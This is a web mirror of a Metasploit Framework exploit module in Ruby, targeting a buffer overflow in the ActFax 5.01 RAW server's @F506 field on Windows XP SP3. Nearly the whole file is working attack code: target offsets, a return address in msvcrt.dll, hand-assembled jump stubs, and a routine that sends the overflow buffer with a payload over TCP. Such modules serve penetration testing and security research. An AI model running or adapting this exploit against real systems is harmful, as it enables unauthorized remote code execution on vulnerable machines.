Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/actfax_raw_server_bof.rb
23824 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name'	=> 'ActFax 5.01 RAW Server Buffer Overflow',

16
        'Description'	=> %q{

17
          This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW

18
          Server can be used to transfer fax messages without any underlying protocols. To

19
          note significant fields in the fax being transferred, like the fax number or the

20
          recipient, ActFax data fields can be used. This module exploits a buffer overflow

21
          in the handling of the @F506 fields due to the insecure usage of strcpy. This

22
          module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).

23
        },

24
        'License'	=> MSF_LICENSE,

25
        'Author' => [

26
          'Craig Freyman', # @cd1zz # discovery and Metasploit module

27
          'corelanc0d3r', # Metasploit module

28
          'juan vazquez' # Metasploit module cleanup

29
        ],

30
        'References' => [

31
          [ 'CVE', '2013-10064' ],

32
          [ 'OSVDB', '89944' ],

33
          [ 'BID', '57789' ],

34
          [ 'EDB', '24467' ],

35
          [ 'URL', 'http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html' ]

36
        ],

37
        'Platform'	=> 'win',

38
        'Payload' => {

39
          'BadChars' => (0x00..0x1f).to_a.pack("C*") + "\x40",

40
          'DisableNops' => true,

41
          'Space' => 1024,

42
          'EncoderOptions' =>

43
              {

44
                'BufferRegister' => 'ECX'

45
              }

46
        },

47
        'Targets' => [

48
          [

49
            'ActFax 5.01 / Windows XP SP3',

50
            {

51
              'Ret' =>	0x77c35459, # push esp # ret # msvcrt.dll

52
              'Offset'	=>	1024

53
            }

54
          ],

55
        ],

56
        'Privileged'	=> false,

57
        'DisclosureDate' => '2013-02-05',

58
        'DefaultTarget'	=> 0,

59
        'Notes' => {

60
          'Reliability' => UNKNOWN_RELIABILITY,

61
          'Stability' => UNKNOWN_STABILITY,

62
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

63
        }

64
      )

65
    )

66
  end

67


68
  def exploit

69
    connect

70
    p = payload.encoded

71
    buffer = p

72
    buffer << rand_text(target['Offset'] - p.length)

73
    buffer << [target.ret].pack("V")

74
    buffer << "\x89\xe1" # mov ecx, esp

75
    buffer << "\x81\xC1\xFC\xFB\xFF\xFF" # add ecx, -1028

76
    buffer << "\x81\xC4\x6C\xEE\xFF\xFF" # add esp, -4500

77
    buffer << "\xE9\xE9\xFB\xFF\xFF" # jmp $-1042

78
    print_status("Trying target #{target.name}...")

79
    sock.put("@F506 " + buffer + "@\r\n\r\n")

80
    disconnect

81
  end

82
end

83


84